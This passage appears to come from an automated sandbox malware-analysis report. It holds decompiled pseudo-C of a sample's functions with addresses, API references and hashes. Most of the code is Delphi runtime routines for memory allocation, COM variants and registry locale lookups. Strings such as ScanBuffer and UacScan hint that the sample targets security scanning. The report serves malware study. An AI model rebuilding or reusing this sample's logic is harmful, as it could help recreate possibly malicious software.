							__eflags = _t250;
							if(__eflags == 0) {
								__eflags = _a4;
								if(__eflags != 0) {
									_t140 = 3;
								}
							}
						}
					} else {
						if((_v1620 & 0x00000fff) == 9) {
							_t140 = 8;
						}
						 *_v44 = 0xfffffffd;
						_v80 = _v80 - 4;
						_v72 = _v72 + 1;
					}
					_push(0);
					_push( &_v36);
					_push(_a4);
					_t210 =  &_v84;
					_push( &_v84);
					_push(_t140);
					_push(0);
					_t141 =  *0x329a858; // 0x3289a04
					_push(_t141);
					_push(_t220);
					_t142 = _v40;
					_push(_t142);
					if( *((intOrPtr*)( *_t142 + 0x18))() != 0) {
						E032776AC();
					}
					_t203 = _v52;
					if(_t203 == 0) {
						L39:
						_t145 = 0;
						_pop(_t221);
						 *[fs:eax] = _t221;
						_push(0x32773e3);
						_t204 = _v52;
						if(_t204 == 0) {
							L41:
							return _t145;
						} else {
							goto L40;
						}
						do {
							L40:
							_t204 = _t204 - 1;
							_t145 =  *((intOrPtr*)(_t256 + _t204 * 8 - 0x250));
							_push(_t145);
							L0326CDB4();
						} while (_t204 != 0);
						goto L41;
					} else {
						do {
							_t203 = _t203 - 1;
							_t254 = _t256 + _t203 * 8 - 0x250;
							_t251 =  *((intOrPtr*)(_t256 + _t203 * 8 - 0x250 + 4));
							_t268 = _t251;
							if(_t251 != 0) {
								E03265350( *_t254, _t210, _t251, _t268);
							}
						} while (_t203 != 0);
						goto L39;
					}
				} else {
					_v56 = _a8;
					_v60 = _t256 + (_t250 + _t250) * 8 - 0x650;
					_t205 = 0;
					do {
						_v60 = _v60 - 0x10;
						_t153 = _t253[_t205 + 3] & 0x000000ff;
						_v48 = _t153 & 0x7f;
						_t154 = _t153 & 0x00000080;
						if(_v48 != 0xa) {
							__eflags = _v48 - 0x48;
							if(_v48 != 0x48) {
								__eflags = _t154;
								if(_t154 == 0) {
									__eflags = _v48 - 0xc;
									if(_v48 != 0xc) {
										 *_v60 = _v48;
										_v60[2] =  *_v56;
										__eflags = _v48 - 5;
										if(_v48 >= 5) {
											__eflags = _v48 - 7;
											if(_v48 <= 7) {
												_t93 =  &_v56;
												 *_t93 =  &(_v56[1]);
												__eflags =  *_t93;
												_v60[3] =  *_v56;
											}
										}
									} else {
										__eflags =  *_v56 - 0x100;
										if( *_v56 != 0x100) {
											_t161 = _v56;
											 *_v60 =  *_t161;
											_v60[1] = _t161[1];
											_t207 = _v60;
											_v60[2] = _t161[2];
											_v60[3] = _t161[3];
											_v56 =  &(_v56[3]);
										} else {
											_v68 = _t256 + _v52 * 8 - 0x250;
											 *_v68 = E03265374(_v56[2], _t207);
											_v68[1] = 0;
											 *_v60 = 8;
											_v60[2] =  *_v68;
											_v52 = _v52 + 1;
										}
									}
									goto L23;
								}
								__eflags = _v48 - 0xc;
								if(_v48 == 0xc) {
									__eflags =  *( *_v56) - 0x100;
									if( *( *_v56) == 0x100) {
										_t207 = 8;
										E0326EABC( *_v56, 8,  *_v56, _t250, _t272);
									}
								}
								 *_v60 = _v48 | 0x00004000;
								_v60[2] =  *_v56;
								goto L23;
							} else {
								_v64 = _t256 + _v52 * 8 - 0x250;
								__eflags = _t154;
								if(_t154 == 0) {
									 *_v64 = E03265374( *_v56, _t207);
									__eflags = 0;
									 *(_v64 + 4) = 0;
									 *_v60 = 8;
									_v60[2] =  *_v64;
								} else {
									 *_v64 = E03265374( *( *_v56), _t207);
									 *(_v64 + 4) =  *_v56;
									 *_v60 = 0x4008;
									_v60[2] = _v64;
								}
								_v52 = _v52 + 1;
								L23:
								_t98 =  &_v56;
								 *_t98 =  &(_v56[1]);
								__eflags =  *_t98;
								goto L24;
							}
						} else {
							 *_v60 = 0xa;
							_v60[2] = 0x80020004;
						}
						L24:
						_t205 = _t205 + 1;
					} while (_t250 != _t205);
					goto L25;
				}
			}

0x032770d4
0x032770d5
0x032770d7
0x032770e0
0x032770e3
0x032770e5
0x032770eb
0x032770f1
0x032770f8
0x032770f9
0x032770fe
0x03277101
0x03277106
0x03277109
0x0327710b
0x0327710c
0x03277111
0x03277114
0x03277117
0x0327711e
0x03277120
0x0327712d
0x03277132
0x03277132
0x03277139
0x03277300
0x03277306
0x0327730f
0x03277312
0x03277319
0x0327731f
0x03277321
0x03277327
0x03277351
0x03277354
0x03277356
0x03277358
0x0327735a
0x0327735e
0x03277360
0x03277360
0x0327735e
0x03277358
0x03277329
0x03277338
0x0327733a
0x0327733a
0x03277342
0x03277348
0x0327734c
0x0327734c
0x03277365
0x0327736a
0x0327736e
0x0327736f
0x03277372
0x03277373
0x03277374
0x03277376
0x0327737b
0x0327737c
0x0327737d
0x03277380
0x03277388
0x0327738d
0x0327738d
0x03277392
0x03277397
0x032773b5
0x032773b5
0x032773b7
0x032773ba
0x032773bd
0x032773c2
0x032773c7
0x032773db
0x032773db
0x00000000
0x00000000
0x00000000
0x032773c9
0x032773c9
0x032773c9
0x032773ca
0x032773d1
0x032773d2
0x032773d7
0x00000000
0x03277399
0x03277399
0x03277399
0x0327739a
0x032773a1
0x032773a4
0x032773a6
0x032773ac
0x032773ac
0x032773b1
0x00000000
0x03277399
0x0327713f
0x03277142
0x03277150
0x03277153
0x03277155
0x03277155
0x03277159
0x03277166
0x03277169
0x0327716f
0x03277189
0x0327718d
0x03277203
0x03277205
0x0327724c
0x03277250
0x032772cb
0x032772d5
0x032772d8
0x032772dc
0x032772de
0x032772e2
0x032772e4
0x032772e4
0x032772e4
0x032772f0
0x032772f0
0x032772e2
0x03277252
0x03277255
0x0327725a
0x0327729a
0x032772a2
0x032772aa
0x032772b0
0x032772b3
0x032772bc
0x032772bf
0x0327725c
0x03277266
0x03277277
0x0327727e
0x03277284
0x03277292
0x03277295
0x03277295
0x0327725a
0x00000000
0x03277250
0x03277207
0x0327720b
0x03277212
0x03277217
0x03277225
0x0327722a
0x0327722a
0x03277217
0x0327723a
0x03277244
0x00000000
0x0327718f
0x03277199
0x0327719c
0x0327719e
0x032771dd
0x032771e2
0x032771e4
0x032771ea
0x032771f8
0x032771a0
0x032771af
0x032771b9
0x032771bf
0x032771cb
0x032771cb
0x032771fb
0x032772f3
0x032772f3
0x032772f3
0x032772f3
0x00000000
0x032772f3
0x03277171
0x03277174
0x0327717d
0x0327717d
0x032772f7
0x032772f7
0x032772f8
0x00000000
0x03277155

APIs

SysFreeString.OLEAUT32(?), ref: 032773D2

Strings

H, xrefs: 03277189

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 456a60a71ac524b4de9c76ee92d17f57b46975cfa74c605fb666da2af519a3ec
Instruction ID: 5f6239e88e0945bdab9b8a7a23b3e1f7acf88afb3567ed387bde4188875cdc74
Opcode Fuzzy Hash: 456a60a71ac524b4de9c76ee92d17f57b46975cfa74c605fb666da2af519a3ec
Instruction Fuzzy Hash: BBB1D574A11609DFDB14CF99D4809ADBBF6FF8A310F248169E815AB361D770AC85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0326E3E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0326E3E0(intOrPtr _a4, signed short* _a8, intOrPtr _a12, char _a16) {
				void* _v8;
				char* _v12;
				char _v28;
				void* __ebp;
				signed int _t27;
				intOrPtr _t28;
				intOrPtr _t41;
				intOrPtr _t47;
				void* _t54;
				signed short* _t56;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t74;

				_t71 = _t73;
				_t74 = _t73 + 0xffffffe8;
				_t56 = _a8;
				if( *_t56 != 0x400c) {
					__eflags = _a4;
					if(_a4 != 0) {
						_push( &_v28);
						L0326CDC4();
						_v12 =  &_v28;
					} else {
						_v12 = 0;
					}
					_push(_t71);
					_push(0x326e4d4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t74;
					_t68 =  *_t56 & 0x0000ffff;
					_t27 =  *_t56 & 0xffff;
					__eflags = _t27 - 0x101;
					if(__eflags > 0) {
						_t28 = _t27 - 0x4009;
						__eflags = _t28;
						if(_t28 == 0) {
							goto L12;
						} else {
							__eflags = _t28 != 4;
							if(_t28 != 4) {
								goto L14;
							} else {
								goto L12;
							}
						}
					} else {
						if(__eflags == 0) {
							L12:
							__eflags =  *0x329e298;
							if( *0x329e298 != 0) {
								 *0x329e298(_v12, _t56, _a12,  &_a16); // executed
							}
						} else {
							_t47 = _t27 - 9;
							__eflags = _t47;
							if(_t47 == 0) {
								goto L12;
							} else {
								__eflags = _t47 == 4;
								if(_t47 == 4) {
									goto L12;
								} else {
									L14:
									_t41 = E03272E88(_t68,  &_v8);
									__eflags = _t41;
									if(_t41 == 0) {
										E0326DC7C(_t59);
									} else {
										 *((intOrPtr*)( *_v8 + 0x10))( &_a16, _a12);
									}
								}
							}
						}
					}
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x326e4db);
					__eflags = _v12;
					if(_v12 != 0) {
						E0326E7F0(_a4, _v12);
						return E0326E3C4( &_v28);
					}
					return 0;
				} else {
					_t54 = E0326E3E0(_a4, _t56[4], _a12, _a16);
					return _t54;
				}
			}

0x0326e3e1
0x0326e3e3
0x0326e3e8
0x0326e3f0
0x0326e40f
0x0326e413
0x0326e41f
0x0326e420
0x0326e428
0x0326e415
0x0326e417
0x0326e417
0x0326e42d
0x0326e42e
0x0326e433
0x0326e436
0x0326e439
0x0326e43c
0x0326e43f
0x0326e444
0x0326e454
0x0326e454
0x0326e459
0x00000000
0x0326e45b
0x0326e45b
0x0326e45e
0x00000000
0x00000000
0x00000000
0x00000000
0x0326e45e
0x0326e446
0x0326e446
0x0326e460
0x0326e460
0x0326e467
0x0326e476
0x0326e47c
0x0326e448
0x0326e448
0x0326e448
0x0326e44b
0x00000000
0x0326e44d
0x0326e44d
0x0326e450
0x00000000
0x0326e452
0x0326e481
0x0326e486
0x0326e48b
0x0326e48d
0x0326e4a6
0x0326e48f
0x0326e4a1
0x0326e4a1
0x0326e48d
0x0326e450
0x0326e44b
0x0326e446
0x0326e4ad
0x0326e4b0
0x0326e4b3
0x0326e4b8
0x0326e4bc
0x0326e4c6
0x00000000
0x0326e4ce
0x0326e4d3
0x0326e3f2
0x0326e402
0x0326e4e0
0x0326e4e0

APIs

VariantInit.OLEAUT32(?), ref: 0326E420

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: a9937d5f975b0362b0c959eb005e2c01a8d94b66c7c7654237d7c42efce1881e
Instruction ID: 60b8cdb508d6378c8604c3829b35ad1563244fedd2f78728edaa0a62c7bb1381
Opcode Fuzzy Hash: a9937d5f975b0362b0c959eb005e2c01a8d94b66c7c7654237d7c42efce1881e
Instruction Fuzzy Hash: 91316F79A20209EFDB20DFBCDA849AE77ACFF08210F5A4461E904D7284E674D9D0C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 03276D64 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E03276D64(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;

				_push(0);
				_push(_t26);
				_push(0x3276db1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				E03264DA4( &_v8, __eax);
				_push(E03264DB4(_v8)); // executed
				L0326CDAC(); // executed
				E03276D54(_t9);
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(0x3276db8);
				return E03264C24( &_v8);
			}

0x03276d67
0x03276d71
0x03276d72
0x03276d77
0x03276d7a
0x03276d83
0x03276d90
0x03276d91
0x03276d96
0x03276d9d
0x03276da0
0x03276da3
0x03276db0

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,03276DB1,?,?,?,00000000), ref: 03276D91

Part of subcall function 03264C24: SysFreeString.OLEAUT32(0327D70C), ref: 03264C32

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 8258eb90c0f2abb7854e53c7d8fe9a6bfd3625f0be7c5bba9f522585b8419c42
Instruction ID: 7edbcc01d6e16f6046a15abf67d181a6b3fe2e3cb510b80751cc31bcfe059190
Opcode Fuzzy Hash: 8258eb90c0f2abb7854e53c7d8fe9a6bfd3625f0be7c5bba9f522585b8419c42
Instruction Fuzzy Hash: 8BE09B79634708BFD701FBA1CC51D9E77ECEF89610B620471E844E7611D9B55D848464

Uniqueness

Uniqueness Score: -1.00%

Function 0326582C Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0326582C(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				CHAR* _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x3260000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E03265A90(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x3260000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x3260000
				return  *_t7;
			}

0x03265834
0x0326583a
0x03265846
0x0326584a
0x03265853
0x03265858
0x0326585a
0x0326585f
0x03265861
0x03265864
0x03265864
0x0326585f
0x03265867
0x03265872

APIs

GetModuleFileNameA.KERNEL32(03260000,?,00000105), ref: 0326584A

Part of subcall function 03265A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,03260000,03289790), ref: 03265AAC
Part of subcall function 03265A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03260000,03289790), ref: 03265ACA
Part of subcall function 03265A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03260000,03289790), ref: 03265AE8
Part of subcall function 03265A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03265B06
Part of subcall function 03265A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,03265B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03265B4F
Part of subcall function 03265A90: RegQueryValueExA.ADVAPI32(?,03265CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,03265B95,?,80000001), ref: 03265B6D
Part of subcall function 03265A90: RegCloseKey.ADVAPI32(?,03265B9C,00000000,?,?,00000000,03265B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03265B8F

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
Instruction ID: b0983b57d190591269c875159ecc4f330d0620752946d9acad1351e2d5a6ac83
Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
Instruction Fuzzy Hash: 3BE06D71A103158BCB10DE5898C0A5633D8AF09754F1809A1EC54CF246D3B0D9E08BD0

Uniqueness

Uniqueness Score: -1.00%

Function 03267E40 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03267E40(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E03264964(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x03267e4b
0x03267e53
0x03267e5c
0x03267e5d
0x03267e60
0x03267e60

APIs

GetFileAttributesA.KERNEL32(00000000,03392880,0327DEBB,ScanString,03286AA0,ScanBuffer,03286AA0,UacInitialize,03286AA0,UacScan,03286AA0,Initialize,03286AA0,ScanBuffer,03286AA0,OpenSession), ref: 03267E4B

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
Instruction ID: a5bf0bfd8bdcf5bcb9c7f138bf317d98e95398b38ba0c312ab99b58997b91734
Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
Instruction Fuzzy Hash: 19C08CE82323060A3A50EAFC3CC416D42C80D4503CB380E21E078DA2D1D26698EA2460

Uniqueness

Uniqueness Score: -1.00%

Function 032874EC Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032874EC(int __eax) {
				int _t3;

				_t3 = timeSetEvent(__eax, 0, E032874E0, 0, 1); // executed
				 *0x3392864 = _t3;
				return _t3;
			}

0x032874fc
0x03287501
0x03287507

APIs

timeSetEvent.WINMM(00002710,00000000,032874E0,00000000,00000001), ref: 032874FC

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 9b3594c8772012f492f44a464bc0541587166dbdb17c51f956c1ab85939765dc
Instruction ID: bed32331460bfa808e232bbe9520cd2a53370b42f725718835946dd6a70dfcad
Opcode Fuzzy Hash: 9b3594c8772012f492f44a464bc0541587166dbdb17c51f956c1ab85939765dc
Instruction Fuzzy Hash: 4EC092F13A630C7BF620B7A91CC2F2B199CDB04B21FA00452B664EE2E2D2E258804664

Uniqueness

Uniqueness Score: -1.00%

Function 032615CC Relevance: 1.3, APIs: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032615CC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void* _t10;
				void** _t15;
				void* _t17;

				_t8 = __eax;
				E03261560(__eax);
				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x329b720 = 0;
					return 0;
				} else {
					_t15 =  *0x329b70c; // 0x91c0000
					_t10 = _t4;
					 *_t10 = 0x329b708;
					 *0x329b70c = _t4;
					 *(_t10 + 4) = _t15;
					 *_t15 = _t4;
					_t17 = _t4 + 0x140000;
					 *((intOrPtr*)(_t17 - 4)) = 2;
					 *0x329b720 = 0x13fff0 - _t8;
					_t7 = _t17 - _t8;
					 *0x329b71c = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}

0x032615cd
0x032615cf
0x032615e2
0x032615e9
0x0326163a
0x03261642
0x032615eb
0x032615eb
0x032615f1
0x032615f3
0x032615f9
0x032615fe
0x03261601
0x03261605
0x03261610
0x0326161d
0x03261625
0x03261627
0x03261634
0x03261637
0x03261637

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,03261A03), ref: 032615E2

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5f80ecd3e015b77ef03f45690155ecf774c51eb6ece6bdb898cb7e0be7a2bf75
Instruction ID: 650e818a97476e281326cd7ee52f079e22cecd9f8b0cca78fed5069ba6cf7c9c
Opcode Fuzzy Hash: 5f80ecd3e015b77ef03f45690155ecf774c51eb6ece6bdb898cb7e0be7a2bf75
Instruction Fuzzy Hash: CAF0F9F1B113004FEB05EF79BD94355BAD6EB89244F24C27AD609DB398E771A4418B50

Uniqueness

Uniqueness Score: -1.00%

Function 03261682 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03261682(intOrPtr __eax) {
				void* _t6;
				void** _t9;
				void* _t11;
				void* _t15;
				long _t20;
				intOrPtr _t24;

				_t24 = __eax;
				_t20 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
				_t6 = VirtualAlloc(0, _t20, 0x101000, 4); // executed
				_t11 = _t6;
				if(_t11 != 0) {
					_t15 = _t11;
					 *((intOrPtr*)(_t15 + 8)) = _t24;
					 *(_t15 + 0xc) = _t20 | 0x00000004;
					E03261644();
					_t9 =  *0x329d7b0; // 0x7fde0000
					 *_t15 = 0x329d7ac;
					 *0x329d7b0 = _t11;
					 *(_t15 + 4) = _t9;
					 *_t9 = _t11;
					 *0x329d7a8 = 0;
					_t11 = _t11 + 0x10;
				}
				return _t11;
			}

0x03261688
0x03261694
0x032616a4
0x032616a9
0x032616ad
0x032616af
0x032616b1
0x032616b7
0x032616ba
0x032616bf
0x032616c4
0x032616ca
0x032616d0
0x032616d3
0x032616d5
0x032616dc
0x032616dc
0x032616e5

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 032616A4

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9afe3e03ec66c2c3801c885e8dd6234173f6a9d5ebbcfc230a313bc83c3cbc75
Instruction ID: 02c0679651a0449e02e38c85a5991bcaa6f0d3f5c5ebc58cde241af41289c5c1
Opcode Fuzzy Hash: 9afe3e03ec66c2c3801c885e8dd6234173f6a9d5ebbcfc230a313bc83c3cbc75
Instruction Fuzzy Hash: F0F0BEB6A007956BE710EF5AAC84B82BB94FB01324F05813AFA089B344D7B0B8908794

Uniqueness

Uniqueness Score: -1.00%

Function 032616E6 Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032616E6(void* __eax) {
				void* _t5;
				signed int _t6;
				signed int _t7;
				void* _t10;
				void* _t13;
				void _t16;

				_t10 = __eax - 0x10;
				E03261644();
				_t5 = _t10;
				_t16 =  *_t5;
				_t13 =  *(_t5 + 4);
				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
				if(_t6 == 0) {
					_t7 = _t6 | 0xffffffff;
				} else {
					 *_t13 = _t16;
					 *(_t16 + 4) = _t13;
					_t7 = 0;
				}
				 *0x329d7a8 = 0;
				return _t7;
			}

0x032616ed
0x032616f0
0x032616f5
0x032616f7
0x032616f9
0x03261704
0x0326170b
0x03261716
0x0326170d
0x0326170d
0x0326170f
0x03261712
0x03261712
0x03261719
0x03261723

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,03261FE4), ref: 03261704

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 7d452f8b699fdabd1ba6b3c6d8f30cc8219439e5299bb886243f5a618e3dcf7e
Instruction ID: 933224ce3af5706f7b010b748e45043f5031f9732f678fe291fca87f5e7d7685
Opcode Fuzzy Hash: 7d452f8b699fdabd1ba6b3c6d8f30cc8219439e5299bb886243f5a618e3dcf7e
Instruction Fuzzy Hash: 4AE08C79320311AFE710AB7A5D85B52ABD8EF58664F288476F601DB285D2F0F8A08760

Uniqueness

Uniqueness Score: -1.00%

Function 0326415C Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0326415C(intOrPtr __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _t27;
				char _t32;
				signed int _t33;
				signed int _t34;
				int _t42;
				void* _t55;
				intOrPtr _t60;
				void _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t72;
				struct HINSTANCE__* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t72 = __edx;
				_t60 = __ebx;
				_t27 = memcpy(_t89 - 0x3c, 0x329d7c8, 0xb << 2);
				_t92 = _t91 + 0xc;
				_pop( *0x329d7e8);
				_pop( *0x329d7e4);
				 *0x329d7dc = _t89;
				 *0x329d7e0 = __ebx;
				 *0x329d7d0 = _t27;
				 *0x329d7d8 = _t72;
				 *0x329d7c8 = _t89 - 0x3c;
				_t66 = 0;
				if( *(_t89 + 0xc) == 0) {
					_t66 =  *_t27;
				}
				 *0x329d7d4 = _t66;
				 *0x329b014 = 0x3261178;
				 *0x329b018 = 0x3261180;
				E03264048();
				_t32 =  *(_t89 + 0xc) + 1;
				 *0x329d7f0 = _t32;
				_t33 = _t32 - 1;
				_pop(_t67);
				 *0x329d7ec =  *_t67;
				if(_t33 != 0 && _t33 < 3) {
					 *((intOrPtr*)(_t67 + _t33 * 4))();
				}
				_push(_t67);
				_t68 =  *((intOrPtr*)(_t92 + 8));
				if(_t68 != 0) {
					 *_t68();
				}
				_pop(_t69);
				_t34 =  *(_t89 + 0xc);
				if(_t34 >= 3) {
					 *((intOrPtr*)(_t69 + _t34 * 4))();
				}
				if( *0x329b030 == 0) {
					 *0x329b038 = 1;
					asm("fnstcw word [0x3289024]");
				}
				if( *(_t89 + 0xc) != 1) {
					_push(_t60);
					_push(0x329d7c8);
					_push(0x329d7de);
					_push(_t89);
					if( *0x0329D7F0 != 0 ||  *0x329b048 == 0) {
						L16:
						if( *0x3289004 != 0) {
							E0326428C();
							E03264320(_t69);
							 *0x3289004 = 0;
						}
						L18:
						if( *((char*)(0x329d7f0)) == 2 &&  *0x3289000 == 0) {
							 *0x0329D7D4 = 0;
						}
						E03264090();
